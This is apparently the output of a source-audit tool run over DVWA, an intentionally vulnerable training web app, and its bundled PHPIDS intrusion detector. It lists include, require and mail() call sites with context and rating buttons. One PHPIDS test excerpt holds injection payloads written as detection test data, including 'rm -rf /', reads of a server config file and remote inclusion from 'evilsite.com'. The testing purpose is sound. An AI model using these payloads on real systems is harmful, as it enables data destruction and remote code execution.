3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_r/index.php:4 (23/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./external/phpids/0.6/docs/examples/example.php:19 (24/70) OK | Dubious | Bad | Hide 
16- * GNU General Public License for more details.
17- */
18-
19:// set the include path properly for PHPIDS
20:set_include_path(
21:    get_include_path()
22-    . PATH_SEPARATOR
23-    . '../../lib/'
24-);
./external/phpids/0.6/docs/examples/cakephp/ids.php:99 (25/70) OK | Dubious | Bad | Hide 
96-    private $init = NULL;
97-
98-    /**
99:     * This function includes the IDS vendor parts and runs the
100-     * detection routines on the request array.
101-     *
102-     * @param object cake controller object
./external/phpids/0.6/docs/examples/cakephp/ids.php:110 (26/70) OK | Dubious | Bad | Hide 
107-        $this->controller = &$controller;
108-        $this->name = Inflector::singularize($this->controller->name);
109-
110:        #set include path for IDS  and store old one
111:        $path = get_include_path();
112:        set_include_path( VENDORS . 'phpids/');
113-
114-        #require the needed files
115-        vendor('phpids/IDS/Init');
./external/phpids/0.6/docs/examples/cakephp/ids.php:128 (27/70) OK | Dubious | Bad | Hide 
125-        $ids        = new IDS_Monitor($this->init, $_REQUEST);
126-        $result     = $ids->run();
127-
128:        // Re-set include path
129:        set_include_path($path);
130-
131-        if (!$result->isEmpty()) {
132-            $this->react($result);
./external/phpids/0.6/tests/IDS/ReportTest.php:23 (28/70) OK | Dubious | Bad | Hide 
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Report.php';
25-require_once 'IDS/Event.php';
26-
./external/phpids/0.6/tests/IDS/MonitorTest.php:22 (29/70) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:MonitorTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-require_once 'PHPUnit/Framework/TestCase.php';
22:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
23-require_once 'IDS/Monitor.php';
24-require_once 'IDS/Init.php';
25-require_once 'IDS/Filter/Storage.php';
./external/phpids/0.6/tests/IDS/MonitorTest.php:1015 (30/70) OK | Dubious | Bad | Hide 
1012-        $exploits[] = '"; <?php exec("rm -rf /"); ?>';
1013-        $exploits[] = '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');';
1014-        $exploits[] = ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))';
1015:        $exploits[] = '; include "http://evilsite.com/evilcode"';
1016-        $exploits[] = '; rm -rf /\0';
1017-        $exploits[] = '"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="';
1018-        $exploits[] = '";
./external/phpids/0.6/tests/IDS/EventTest.php:23 (31/70) OK | Dubious | Bad | Hide 
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Event.php';
25-require_once 'IDS/Filter.php';
26-
./external/phpids/0.6/tests/IDS/ExceptionTest.php:23 (32/70) OK | Dubious | Bad | Hide 
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-require_once 'IDS/Caching/Factory.php';
26-require_once 'IDS/Report.php';
./external/phpids/0.6/tests/IDS/FilterTest.php:23 (33/70) OK | Dubious | Bad | Hide 
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-
26-class IDS_FilterTest extends PHPUnit_Framework_TestCase
./external/phpids/0.6/tests/IDS/InitTest.php:23 (34/70) OK | Dubious | Bad | Hide 
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-
26-class IDS_InitTest extends PHPUnit_Framework_TestCase {
./external/phpids/0.6/tests/IDS/CachingTest.php:23 (35/70) OK | Dubious | Bad | Hide 
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-require_once 'IDS/Caching/Factory.php';
26-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:105 (36/70) OK | Dubious | Bad | Hide 
102-
103-            if ($caching && $caching != 'none') {
104-                $this->cacheSettings = $init->config['Caching'];
105:                include_once 'IDS/Caching/Factory.php';
106-                $this->cache = IDS_Caching::factory($init, 'storage');
107-            }
108-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:233 (37/70) OK | Dubious | Bad | Hide 
230-            $nocache = $filters instanceof SimpleXMLElement;
231-            $filters = $nocache ? $filters->filter : $filters;
232-
233:            include_once 'IDS/Filter.php';
234-
235-            foreach ($filters as $filter) {
236-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:328 (38/70) OK | Dubious | Bad | Hide 
325-            $nocache = !is_array($filters);
326-            $filters = $nocache ? $filters->filters->filter : $filters;
327-
328:            include_once 'IDS/Filter.php';
329-
330-            foreach ($filters as $filter) {
331-
./external/phpids/0.6/lib/IDS/Caching/Factory.php:76 (39/70) OK | Dubious | Bad | Hide 
73-            $wrapper . '.php';
74-
75-        if (file_exists($path)) {
76:            include_once $path;
77-
78-            if (class_exists($class)) {
79-                $object = call_user_func(array($class, 'getInstance'),
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter/ExtractStyleBlocks.php:13 (40/70) OK | Dubious | Bad | Hide 
10- *      sample usage.
11- * 
12- * @note
13: *      This filter can also be used on stylesheets not included in the
14- *      document--something purists would probably prefer. Just directly
15- *      call HTMLPurifier_Filter_ExtractStyleBlocks->cleanCSS()
16- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Bootstrap.php:80 (41/70) OK | Dubious | Bad | Hide 
77-                            HTML Purifier autoloader registrar is not compatible
78-                            with non-static object methods due to PHP Bug #44144;
79-                            Please do not use HTMLPurifier.autoload.php (or any
80:                            file that includes this file); instead, place the code:
81-                            spl_autoload_register(array(\'HTMLPurifier_Bootstrap\', \'autoload\'))
82-                            after your own autoloaders.
83-                        ');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:50 (42/70) OK | Dubious | Bad | Hide 
47-permit persons to whom the Software is furnished to do so, subject to 
48-the following conditions: 
49-
50:The above copyright notice and this permission notice shall be included 
51-in all copies or substantial portions of the Software. 
52-
53-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:114 (43/70) OK | Dubious | Bad | Hide 
111-        // later keys takes precedence
112-        foreach($def->attr as $k => $v) {
113-            if ($k === 0) {
114:                // merge in the includes
115:                // sorry, no way to override an include
116-                foreach ($v as $v2) {
117-                    $this->attr[0][] = $v2;
118-                }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:31 (44/70) OK | Dubious | Bad | Hide 
28-                }
29-                foreach ($coll as $attr_i => $attr) {
30-                    if ($attr_i === 0 && isset($this->info[$coll_i][$attr_i])) {
31:                        // merge in includes
32-                        $this->info[$coll_i][$attr_i] = array_merge(
33-                            $this->info[$coll_i][$attr_i], $attr);
34-                        continue;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:42 (45/70) OK | Dubious | Bad | Hide 
39-        }
40-        // perform internal expansions and inclusions
41-        foreach ($this->info as $name => $attr) {
42:            // merge attribute collections that include others
43-            $this->performInclusions($this->info[$name]);
44-            // replace string identifiers with actual attribute objects
45-            $this->expandIdentifiers($this->info[$name], $attr_types);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URISchemeRegistry.php:41 (46/70) OK | Dubious | Bad | Hide 
38-        if (!$config) $config = HTMLPurifier_Config::createDefault();
39-        $null = null; // for the sake of passing by reference
40-        
41:        // important, otherwise attacker could include arbitrary file
42-        $allowed_schemes = $config->get('URI', 'AllowedSchemes');
43-        if (!$config->get('URI', 'OverrideAllowedSchemes') &&
44-            !isset($allowed_schemes[$scheme])
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php:26 (47/70) OK | Dubious | Bad | Hide 
23-            new HTMLPurifier_AttrTransform_EnumToCSS('align', array(
24-                // we're following IE's behavior, not Firefox's, due
25-                // to the fact that no one supports caption-side:right,
26:                // W3C included (with CSS 2.1). This is a slightly
27-                // unreasonable attribute!
28-                'left'   => 'text-align:left;',
29-                'right'  => 'text-align:right;',
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:142 (48/70) OK | Dubious | Bad | Hide 
139-     *          - Check for literal object name
140-     *          - Throw fatal error
141-     *       If your object name collides with an internal class, specify
142:     *       your module manually. All modules must have been included
143-     *       externally: registerModule will not perform inclusions for you!
144-     */
145-    public function registerModule($module, $overload = false) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:147 (49/70) OK | Dubious | Bad | Hide 
144-        // generate filename
145-        $filename = $this->dir . '/Language/messages/' . $code . '.php';
146-        
147:        // default fallback : may be overwritten by the ensuing include
148-        $fallback = ($code != 'en') ? 'en' : false;
149-        
150-        // load primary localisation
151-        if (!file_exists($filename)) {
152:            // skip the include: will rely solely on fallback
153-            $filename = $this->dir . '/Language/messages/en.php';
154-            $cache = array();
155-        } else {
156:            include $filename;
157-            $cache = compact($this->keys);
158-        }
159-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:14 (50/70) OK | Dubious | Bad | Hide 
11- * @note The public variables in a module should almost directly
12- *       correspond to the variables in HTMLPurifier_HTMLDefinition.
13- *       However, the prefix info carries no special meaning in these
14: *       objects (include it anyway if that's the correspondence though).
15- * @todo Consider making some member functions protected
16- */
17-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:123 (51/70) OK | Dubious | Bad | Hide 
120-     *              Set as false to skip this step.
121-     * @param $contents Allowed children in form of:
122-     *              "$content_model_type: $content_model"
123:     * @param $attr_includes What attribute collections to register to
124-     *              element?
125-     * @param $attr What unique attributes does the element define?
126-     * @note See ElementDef for in-depth descriptions of these parameters.
127-     * @return Created element definition object, so you 
128-     *         can set advanced parameters
129-     */
130:    public function addElement($element, $type, $contents, $attr_includes = array(), $attr = array()) {
131-        $this->elements[] = $element;
132-        // parse content_model
133-        list($content_model_type, $content_model) = $this->parseContents($contents);
134-        // merge in attribute inclusions
135:        $this->mergeInAttrIncludes($attr, $attr_includes);
136-        // add element to content sets
137-        if ($type) $this->addElementToContentSet($element, $type);
138-        // create element
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:203 (52/70) OK | Dubious | Bad | Hide 
200-    }
201-    
202-    /**
203:     * Convenience function that merges a list of attribute includes into
204-     * an attribute array.
205-     * @param $attr Reference to attr array to modify
206:     * @param $attr_includes Array of includes / string include to merge in
207-     */
208:    public function mergeInAttrIncludes(&$attr, $attr_includes) {
209:        if (!is_array($attr_includes)) {
210:            if (empty($attr_includes)) $attr_includes = array();
211:            else $attr_includes = array($attr_includes);
212-        }
213:        $attr[0] = $attr_includes;
214-    }
215-    
216-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:143 (53/70) OK | Dubious | Bad | Hide 
140-    
141-    /**
142-     * Generates attribute declarations from attribute array.
143:     * @note This does not include the leading or trailing space.
144-     * @param $assoc_array_of_attributes Attribute array
145-     * @param $element Name of element attributes are for, used to check
146-     *        attribute minimization.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.path.php:9 (54/70) OK | Dubious | Bad | Hide 
6- * without any other side-effects.
7- */
8-
9:set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:5 (55/70) OK | Dubious | Bad | Hide 
2-
3-/**
4- * @file
5: * This file was auto-generated by generate-includes.php and includes all of
6- * the core files required by HTML Purifier. Use this if performance is a
7- * primary concern and you are using an opcode cache. PLEASE DO NOT EDIT THIS
8- * FILE, changes will be overwritten the next time the script is run.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:13 (56/70) OK | Dubious | Bad | Hide 
10- * @version 3.2.0
11- * 
12- * @warning
13: *      You must *not* include any other HTML Purifier files before this file,
14- *      because 'require' not 'require_once' is used.
15- * 
16- * @warning
17: *      This file requires that the include path contains the HTML Purifier
18- *      library directory; this is not auto-set.
19- */
20-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:5 (57/70) OK | Dubious | Bad | Hide 
2-
3-/**
4- * @file
5: * This file was auto-generated by generate-includes.php and includes all of
6- * the core files required by HTML Purifier. This is a convenience stub that
7: * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT
8- * EDIT THIS FILE, changes will be overwritten the next time the script is run.
9- * 
10: * Changes to include_path are not necessary.
11- */
12-
13-$__dir = dirname(__FILE__);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.auto.php:4 (58/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-/**
4: * This is a stub include that automatically configures the include path.
5- */
6-
7:set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
8-require_once 'HTMLPurifier/Bootstrap.php';
9-require_once 'HTMLPurifier.autoload.php';
./external/phpids/0.6/lib/IDS/Monitor.php:224 (59/70) OK | Dubious | Bad | Hide 
221-            );
222-        }
223-
224:        include_once 'IDS/Report.php';
225-        $this->report = new IDS_Report;
226-    }
227-
./external/phpids/0.6/lib/IDS/Monitor.php:260 (60/70) OK | Dubious | Bad | Hide 
257-            if (is_string($value)) {
258-
259-                if ($filter = $this->_detect($key, $value)) {
260:                    include_once 'IDS/Event.php';
261-                    $this->report->addEvent(
262-                        new IDS_Event(
263-                            $key,
./external/phpids/0.6/lib/IDS/Monitor.php:317 (61/70) OK | Dubious | Bad | Hide 
314-        }
315-
316-        // use the converter
317:        include_once 'IDS/Converter.php';
318-        $value = IDS_Converter::runAll($value);
319-        $value = IDS_Converter::runCentrifuge($value, $this);
320-
./external/phpids/0.6/lib/IDS/Monitor.php:368 (62/70) OK | Dubious | Bad | Hide 
365-     */
366-    private function _purifyValues($key, $value) {
367-
368:        include_once $this->pathToHTMLPurifier;
369-
370-        if (!is_writeable($this->HTMLPurifierCache)) {
371-            throw new Exception(
./external/phpids/0.6/lib/IDS/Init.php:87 (63/70) OK | Dubious | Bad | Hide 
84-     */
85-    private function __construct($configPath = null) 
86-    {
87:        include_once 'IDS/Monitor.php';
88:        include_once 'IDS/Filter/Storage.php';
89-
90-        if ($configPath) {
91-            $this->setConfigPath($configPath);
./external/phpids/0.6/lib/IDS/Report.php:96 (64/70) OK | Dubious | Bad | Hide 
93-    /**
94-     * Constructor
95-     *
96:     * @param array $events the events the report should include
97-     *
98-     * @return void
99-     */
./setup.php:4 (65/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-
./setup.php:15 (66/70) OK | Dubious | Bad | Hide 
12-if( isset( $_POST[ 'create_db' ] ) ) {
13-
14-	if ($DBMS == 'MySQL') {
15:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/MySQL.php';
16-	}
17-	elseif ($DBMS == 'PGSQL') {
18:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/PGSQL.php';
19-	}
20-	else {
21-		dvwaMessagePush( "ERROR: Invalid database selected. Please review the config file syntax." );
./phpinfo.php:3 (67/70) OK | Dubious | Bad | Hide 
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./dvwa/includes/dvwaPage.inc.php:241 (68/70) OK | Dubious | Bad | Hide 
238-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/.' );
239-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'exec', 'name' => 'Command Execution', 'url' => 'vulnerabilities/exec/.' );
240-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/.' );
241:	$menuBlocks['vulnerabilities'][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' );
242-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/.' );
243-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/.' );
244-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'upload', 'name' => 'Upload', 'url' => 'vulnerabilities/upload/.' );
./dvwa/includes/dvwaPhpIds.inc.php:11 (69/70) OK | Dubious | Bad | Hide 
8-define( 'DVWA_WEB_ROOT_TO_PHPIDS', 'external/phpids/'.dvwaPhpIdsVersionGet().'/' );
9-define( 'DVWA_WEB_PAGE_TO_PHPIDS', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS );
10-
11:// Add PHPIDS to include path
12:set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' );
13-
14-require_once 'IDS/Init.php';
15-
./logout.php:4 (70/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-

include_once (10) Top | Hide

./external/phpids/0.6/lib/IDS/Filter/Storage.php:105 (1/10) OK | Dubious | Bad | Hide 
103-            if ($caching && $caching != 'none') {
104-                $this->cacheSettings = $init->config['Caching'];
105:                include_once 'IDS/Caching/Factory.php';
106-                $this->cache = IDS_Caching::factory($init, 'storage');
107-            }
108-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:233 (2/10) OK | Dubious | Bad | Hide 
230-            $nocache = $filters instanceof SimpleXMLElement;
231-            $filters = $nocache ? $filters->filter : $filters;
232-
233:            include_once 'IDS/Filter.php';
234-
235-            foreach ($filters as $filter) {
236-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:328 (3/10) OK | Dubious | Bad | Hide 
325-            $nocache = !is_array($filters);
326-            $filters = $nocache ? $filters->filters->filter : $filters;
327-
328:            include_once 'IDS/Filter.php';
329-
330-            foreach ($filters as $filter) {
331-
./external/phpids/0.6/lib/IDS/Caching/Factory.php:76 (4/10) OK | Dubious | Bad | Hide 
73-            $wrapper . '.php';
74-
75-        if (file_exists($path)) {
76:            include_once $path;
77-
78-            if (class_exists($class)) {
79-                $object = call_user_func(array($class, 'getInstance'),
./external/phpids/0.6/lib/IDS/Monitor.php:224 (5/10) OK | Dubious | Bad | Hide 
221-            );
222-        }
223-
224:        include_once 'IDS/Report.php';
225-        $this->report = new IDS_Report;
226-    }
227-
./external/phpids/0.6/lib/IDS/Monitor.php:260 (6/10) OK | Dubious | Bad | Hide 
257-            if (is_string($value)) {
258-
259-                if ($filter = $this->_detect($key, $value)) {
260:                    include_once 'IDS/Event.php';
261-                    $this->report->addEvent(
262-                        new IDS_Event(
263-                            $key,
./external/phpids/0.6/lib/IDS/Monitor.php:317 (7/10) OK | Dubious | Bad | Hide 
314-        }
315-
316-        // use the converter
317:        include_once 'IDS/Converter.php';
318-        $value = IDS_Converter::runAll($value);
319-        $value = IDS_Converter::runCentrifuge($value, $this);
320-
./external/phpids/0.6/lib/IDS/Monitor.php:368 (8/10) OK | Dubious | Bad | Hide 
365-     */
366-    private function _purifyValues($key, $value) {
367-
368:        include_once $this->pathToHTMLPurifier;
369-
370-        if (!is_writeable($this->HTMLPurifierCache)) {
371-            throw new Exception(
./external/phpids/0.6/lib/IDS/Init.php:87 (9/10) OK | Dubious | Bad | Hide 
84-     */
85-    private function __construct($configPath = null) 
86-    {
87:        include_once 'IDS/Monitor.php';
88:        include_once 'IDS/Filter/Storage.php';
89-
90-        if ($configPath) {
91-            $this->setConfigPath($configPath);
./setup.php:15 (10/10) OK | Dubious | Bad | Hide 
12-if( isset( $_POST[ 'create_db' ] ) ) {
13-
14-	if ($DBMS == 'MySQL') {
15:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/MySQL.php';
16-	}
17-	elseif ($DBMS == 'PGSQL') {
18:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/PGSQL.php';
19-	}
20-	else {
21-		dvwaMessagePush( "ERROR: Invalid database selected. Please review the config file syntax." );

mail( (4) Top | Hide

./external/phpids/0.6/docs/examples/cakephp/ids.php:160 (1/4) OK | Dubious | Bad | Hide 
158-        if ($impact >= $this->threshold['kick']) {
159-            $this->idslog($result, 3, $impact);
160:            $this->idsmail($result);
161-            $this->idskick($result);
162-            return true;
163-        } else if ($impact >= $this->threshold['warn']) {
164-            $this->idslog($result, 2, $impact);
165:            $this->idsmail($result);
166-            $this->idswarn($result);
167-            return true;
168-        } else if ($impact >= $this->threshold['mail']) {
169-            $this->idslog($result, 1, $impact);
170:            $this->idsmail($result);
171-            return true;
172-        } else if ($impact >= $this->threshold['log']) {
173-            $this->idslog($result, 0, $impact);
./external/phpids/0.6/docs/examples/cakephp/ids.php:230 (2/4) OK | Dubious | Bad | Hide 
227-     * @param array $results
228-     * @return boolean
229-     */
230:    private function idsmail($result) {
231-
232-        vendor('phpids/IDS/Log/Email.php');
233-        vendor('phpids/IDS/Log/Composite.php');
./external/phpids/0.6/lib/IDS/Log/Email.php:185 (3/4) OK | Dubious | Bad | Hide 
182-    public static function getInstance($config)
183-    {
184-        if (!self::$instance) {
185:            self::$instance = new IDS_Log_Email($config);
186-        }
187-
188-        return self::$instance;
./external/phpids/0.6/lib/IDS/Log/Email.php:381 (4/4) OK | Dubious | Bad | Hide 
378-    protected function send($address, $data, $headers, $envelope = null)
379-    {
380-        if (!$envelope || strpos(ini_get('sendmail_path'),' -f') !== false) {
381:            return mail($address,
382-                $this->subject,
383-                $data,
384-                $headers);
385-        } else {
386:            return mail($address,
387-                $this->subject,
388-                $data,
389-                $headers,

require (99) Top | Hide

./instructions.php:4 (1/99) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./index.php:5 (2/99) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
8-
./login.php:5 (3/99) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'phpids' ) );
8-
./ids_log.php:4 (4/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-define( 'DVWA_WEB_ROOT_TO_PHPIDS_LOG', 'external/phpids/'.dvwaPhpIdsVersionGet().'/lib/IDS/tmp/phpids_log.txt' );
7-define( 'DVWA_WEB_PAGE_TO_PHPIDS_LOG', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS_LOG );
./about.php:4 (5/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./security.php:4 (6/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:4 (7/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:30 (8/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/csrf/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'csrf';
33-$page[ 'source_button' ] = 'csrf';
./vulnerabilities/fi/index.php:4 (9/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/index.php:30 (10/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/fi/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'fi';
33-$page[ 'source_button' ] = 'fi';
./vulnerabilities/sqli_blind/index.php:4 (11/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli_blind/index.php:30 (12/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli_blind/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli_blind';
33-$page[ 'source_button' ] = 'sqli_blind';
./vulnerabilities/view_source.php:4 (13/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:4 (14/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:30 (15/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/brute/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'brute';
33-$page[ 'source_button' ] = 'brute';
./vulnerabilities/exec/index.php:4 (16/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/exec/index.php:30 (17/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/exec/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'exec';
33-$page[ 'source_button' ] = 'exec';
./vulnerabilities/upload/index.php:4 (18/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
